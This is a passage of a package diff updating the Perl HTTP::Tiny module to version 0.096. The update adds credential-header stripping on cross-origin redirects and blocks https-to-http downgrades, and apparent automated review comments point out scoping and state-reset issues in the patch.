includes a properly #pod formatted C<Last-Modified> header, the file modification time will 
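Review bot: The two new boolean attributes are added to `@attributes` but not to `%persist_ok`, which sits directly below in the same hunk. If, as the name suggests, `%persist_ok` marks attributes whose setter may keep the current keep-alive handle open, then toggling `allow_downgrade` or `allow_credentialed_redirects` on a live object will drop the connection for no reason, since neither affects the socket; if that is the case, `allow_credentialed_redirects allow_downgrade` belong in the `%persist_ok` list too. The accessor generator that consumes `%persist_ok` is outside this hunk, so I cannot confirm its semantics from the diff.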
@@ -364,8 +374,7 @@ #pod how this applies to redirection. #pod #pod If the URL includes a "user:password" stanza, they will be used for Basic-style -#pod authorization headers. (Authorization headers will not be included in a -#pod redirected request.) For example: +#pod authorization headers. For example: #pod #pod $http->request('GET', 'http://Aladdin:open [email protected]/'); #pod @@ -374,6 +383,10 @@ #pod #pod $http->request('GET', 'http://john%40example.com:[email protected]/'); #pod +#pod Caller-supplied C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers +#pod are stripped on cross-origin redirects. See L</new>'s +#pod C<allow_credentialed_redirects> attribute to opt out. +#pod #pod A hashref of options may be appended to modify the request. #pod #pod Valid options are: @@ -427,7 +440,7 @@ #pod #pod =for :list #pod * C<success> — -#pod Boolean indicating whether the operation returned a 2XX status code +#pod Boolean indicating whether the operation returned a C<2XX> status code #pod * C<url> — #pod URL that provided the response. This is the URL of the request unless #pod there were redirections, in which case it is the last URL queried @@ -458,6 +471,7 @@ #pod =cut my %idempotent = map { $_ => 1 } qw/GET HEAD PUT DELETE OPTIONS TRACE/; +my %sensitive_headers = map { $_ => 1 } qw/authorization cookie proxy-authorization/; sub request { my ($self, $method, $url, $args) = @_; @@ -842,6 +856,7 @@ for ($self->{default_headers}, $args->{headers}) { next unless defined; while (my ($k, $v) = each %$_) { + next if $args->{_strip_credentials} && exists $sensitive_headers{lc $k}; $request->{headers}{lc $k} = $v; $request->{header_case}{lc $k} = $k; } 
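Review bot: The stripping in the `_request` header loop is keyed on an exact match against `%sensitive_headers`, so any other credential-bearing header a caller sends (custom API-key headers, a non-standard `X-Auth-Token`, etc.) still crosses origins silently; that is a reasonable scope, matching what browsers and curl strip, but it should be stated, because the `[!!! SECURITY !!!]` changelog entry reads as if credentials in general are now protected. I would add `# Only these three names are stripped on cross-origin redirects; any other credential-bearing header the caller sends is still forwarded.` above `my %sensitive_headers`, and mirror that sentence in the `allow_credentialed_redirects` POD. The `lc $k` lookup makes the match case-insensitive, which is correct for header names. The `_request` sub containing the loop starts and ends outside this hunk.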
@@ -969,9 +984,24 @@ and $headers->{location} and @{$args->{_redirects}} < $self->{max_redirect} ) { - my $location = ($headers->{location} =~ /^\//) + my $location = $headers->{location} =~ m{^//} + ? "$request->{scheme}:$headers->{location}" + : $headers->{location} =~ m{^/} ? "$request->{scheme}://$request->{host_port}$headers->{location}" - : $headers->{location} ; + : $headers->{location}; + my ($to_scheme, $to_host, $to_port) = $self->_split_url($location); + if (!$self->{allow_downgrade} && $request->{scheme} eq 'https' && $to_scheme eq 'http' ) { + return; + } + if ( + !$self->{allow_credentialed_redirects} + && ( $request->{scheme} ne $to_scheme + || $request->{host} ne $to_host + || $request->{port} ne $to_port ) + ) { + $args->{_strip_credentials} = 1; + } + return (($status eq '303' ? 'GET' : $method), $location); } return; @@ -1776,7 +1806,7 @@ =head1 VERSION -version 0.094 +version 0.096 =head1 SYNOPSIS @@ -1821,7 +1851,15 @@ =item * -C<agent> — A user-agent string (defaults to 'HTTP-Tiny/$VERSION'). If C<agent> — ends in a space character, the default user-agent string is appended. +C<agent> — A user-agent string (defaults to 'C<HTTP-Tiny/$VERSION>'). If C<agent> — ends in a space character, the default user-agent string is appended. + +=item * + +C<allow_credentialed_redirects> - If a C<3XX> redirects to a different scheme, host or port, by default HTTP::Tiny will strip away caller-supplied C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers from the redirected request and from all subsequent requests in the chain. Set this to a true value to revert to the legacy behavior of forwarding those headers. Default is C<false>. + +=item * + +C<allow_downgrade> — If a C<3XX> redirect changes the scheme from C<https> to plain C<http>, HTTP::Tiny will by default refuse to follow it, returning the C<3XX> response. Set this to a true value to revert to the legacy behavior of redirecting C<https> to C<http>. Default is C<false>. =item * 
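Review bot: `_strip_credentials` is stored in `$args`, which from the existing `$args->{_redirects}` usage looks like the caller-supplied options hashref, and nothing in this diff clears it when the request completes; unless `request()` deletes it outside the diff, a caller who reuses one options hashref will have `Authorization`/`Cookie` stripped from the first hop of every later request once any earlier request crossed an origin, and the single-retry loop for idempotent methods would likewise replay a retried first hop with the flag already set. Clearing it alongside `_redirects` at the end of `request()` (e.g. `delete $args->{_strip_credentials};`) or resetting it when `@{$args->{_redirects}}` is empty would close that. Two smaller points: the same-origin test `$request->{port} ne $to_port` is only correct if `_split_url` fills in the default port for both sides (otherwise `https://h` and `https://h:443` count as cross-origin and get stripped), and a relative `Location` without a leading `/` now reaches `_split_url` inside `_maybe_redirect`, so its failure mode may have moved earlier than before. The enclosing `_maybe_redirect` sub begins outside the hunk.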
@@ -1919,7 +1957,7 @@ URL must have unsafe characters escaped and international domain names encoded. See C<request()> for valid options and a description of the response. -The C<success> field of the response will be true if the status code is 2XX. +The C<success> field of the response will be true if the status code is C<2XX>. =head2 post_form @@ -1937,7 +1975,7 @@ encoded. See C<request()> for valid options and a description of the response. Any C<content-type> header or content in the options hashref will be ignored. -The C<success> field of the response will be true if the status code is 2XX. +The C<success> field of the response will be true if the status code is C<2XX>. =head2 mirror @@ -1953,8 +1991,8 @@ may specify a different C<If-Modified-Since> header yourself in the C<< $options->{headers} >> hash. -The C<success> field of the response will be true if the status code is 2XX -or if the status code is 304 (unmodified). +The C<success> field of the response will be true if the status code is C<2XX> +or if the status code is C<304> (unmodified). If the file was modified and the server response includes a properly formatted C<Last-Modified> header, the file modification time will @@ -1974,8 +2012,7 @@ how this applies to redirection. If the URL includes a "user:password" stanza, they will be used for Basic-style -authorization headers. (Authorization headers will not be included in a -redirected request.) For example: +authorization headers. For example: $http->request('GET', 'http://Aladdin:open [email protected]/'); @@ -1984,6 +2021,10 @@ $http->request('GET', 'http://john%40example.com:[email protected]/'); +Caller-supplied C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers +are stripped on cross-origin redirects. See L</new>'s +C<allow_credentialed_redirects> attribute to opt out. + A hashref of options may be appended to modify the request. Valid options are: 
@@ -2041,7 +2082,7 @@ =item * -C<success> — Boolean indicating whether the operation returned a 2XX status code +C<success> — Boolean indicating whether the operation returned a C<2XX> status code =item * @@ -2121,6 +2162,8 @@ =for Pod::Coverage SSL_options agent +allow_credentialed_redirects +allow_downgrade cookie_jar default_headers http_proxy @@ -2336,10 +2379,10 @@ =item * Redirection is very strict against the specification. Redirection is only -automatic for response codes 301, 302, 307 and 308 if the request method is -'GET' or 'HEAD'. Response code 303 is always converted into a 'GET' -redirection, as mandated by the specification. There is no automatic support -for status 305 ("Use proxy") redirections. +automatic for response codes C<301>, C<302>, C<307> and C<308> if the request +method is 'GET' or 'HEAD'. Response code C<303> is always converted into a +'GET' redirection, as mandated by the specification. There is no automatic +support for status C<305> ("Use proxy") redirections. =item * diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/t/001_api.t new/HTTP-Tiny-0.096/t/001_api.t --- old/HTTP-Tiny-0.094/t/001_api.t 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/t/001_api.t 2026-06-08 11:21:52.000000000 +0200 
@@ -7,8 +7,9 @@ use HTTP::Tiny; my @accessors = qw( - agent default_headers http_proxy https_proxy keep_alive local_address - max_redirect max_size proxy no_proxy timeout SSL_options verify_SSL cookie_jar + agent allow_credentialed_redirects allow_downgrade default_headers http_proxy + https_proxy keep_alive local_address max_redirect max_size proxy no_proxy timeout + SSL_options verify_SSL cookie_jar ); my @methods = qw( new get head put post patch delete post_form request mirror www_form_urlencode can_ssl diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/xt/author/pod-spell.t new/HTTP-Tiny-0.096/xt/author/pod-spell.t --- old/HTTP-Tiny-0.094/xt/author/pod-spell.t 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/xt/author/pod-spell.t 2026-06-08 11:21:52.000000000 +0200 @@ -10,7 +10,6 @@ add_stopwords(<DATA>); all_pod_files_spelling_ok( qw( bin lib ) ); __DATA__ -2XX Alan Alders Alessandro ++++++ _scmsync.obsinfo ++++++ --- /var/tmp/diff_new_pack.5F5B63/_old 2026-06-08 16:54:57.545436627 +0200 +++ /var/tmp/diff_new_pack.5F5B63/_new 2026-06-08 16:54:57.561437290 +0200 @@ -1,6 +1,6 @@ -mtime: 1779097238 -commit: 649629c19d0f92d28444356031b724e8e8328508a3863e13ef025463c2391765 +mtime: 1780912645 +commit: 74164c707b14e62b68474eab69830a01acb3bef6e038044e2c5a1c9027754b7c url: https://src.opensuse.org/perl/perl-HTTP-Tiny -revision: 649629c19d0f92d28444356031b724e8e8328508a3863e13ef025463c2391765 +revision: 74164c707b14e62b68474eab69830a01acb3bef6e038044e2c5a1c9027754b7c projectscmsync: https://src.opensuse.org/perl/_ObsPrj ++++++ build.specials.obscpio ++++++ ++++++ build.specials.obscpio ++++++ diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/.gitignore new/.gitignore --- old/.gitignore 1970-01-01 01:00:00.000000000 +0100 +++ new/.gitignore 2026-06-08 11:57:25.000000000 +0200 @@ -0,0 +1 @@ +.osc
